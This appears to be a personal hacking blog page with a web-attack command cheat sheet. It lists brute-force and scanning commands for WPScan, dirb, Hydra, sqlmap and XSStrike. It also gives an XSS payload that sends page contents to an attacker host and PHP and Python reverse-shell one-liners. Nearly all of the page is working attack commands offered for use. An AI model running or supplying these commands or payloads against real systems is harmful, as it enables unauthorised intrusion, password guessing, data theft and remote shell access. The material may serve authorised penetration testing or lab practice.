j0moz4@LIITN:/web:$'s blog

h0me

c0nt3nt

ad/lab-(bleach.local)

w4ke-up-s4mura1

komm4nds-ch347-sheet

x$$-f0r3st

de4l3r

Styled Cheatsheet Table

HACKING WEB TABLE OF COMMANDS

TOOL	COMMAND
WPSCAN	wpscan --url https://webpage -e ap --wp-plugins-dir /wp-content/plugins/ --plugins-detection mixed --cookie-string "" --api-token --random-user-agent -v wpscan --url http://webpage --usernames bob --passwords ../rockyou.txt max-threads 50
DIRB	dirb https://target.web -c "COOKIE-STRING" -p 127.0.0.1:8080 -z 4000 -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -a "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" -l -w
WhatWaf	sudo ./whatwaf -u "https://webpage:8080/" --proxy http://127.0.0.1:8080 --ra -T --force-ssl --threads 5 -H "Cookie: <cookies>" -H "<HEADER>" --verbose
XSStrike	python3 xsstrike.py --url "https://target.com/admin.php?option=2" --fuzzer -l 5 --crawl --params --blind --proxy --headers "Cookie: <cookie>"
CeWL	cewl -d 2 -m 5 -w docswords.txt https://example.com
Hydra	export HYDRA_PROXY_HTTP=http://127.0.0.1:8080 & hydra -L ./Documents/data/fuzz/SecLists/Usernames/Names/names.txt -p password target.com -s 32721 http-post-form "/admin/index.php:Action=Login&username=^USER^&password=^PASS^:F=No account found with that username." -V
Dalfox	cat list.txt \| dalfox pipe --mass
SQLMAP with BURP	sqlmap.py --url "https://webpage" --data "<request>" --random-agent --delay=2 --proxy=https://127.0.0.1:8080 --time-sec=10 --level=1 --risk=1 --cookie "<cookie>" --tamper charencode --dbms mysql OR from file: sqlmap.py -r request_file --random-agent --delay=2 --proxy=https://127.0.0.1:8080 --time-sec=10 --level=1 --risk=1 --cookie "<cookie>" --tamper charencode --dbms mysql
XSS Payload	<svg/onload="(new Image()).src='//attacker.domain/'%2Bdocument.documentElement.innerHTML"> <img src=something onauxclick="new Function `al\ert\`xss\``">
Reverse Shells	PHP: php -r '$sock=fsockopen("[IPADDR]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");' Python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.38.29",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
HTTP Status Codes	200 OK - The request has succeeded. 301 Moved Permanently - The requested resource has been assigned a new permanent URI. 403 Forbidden - The server understood the request, but is refusing to fulfill it.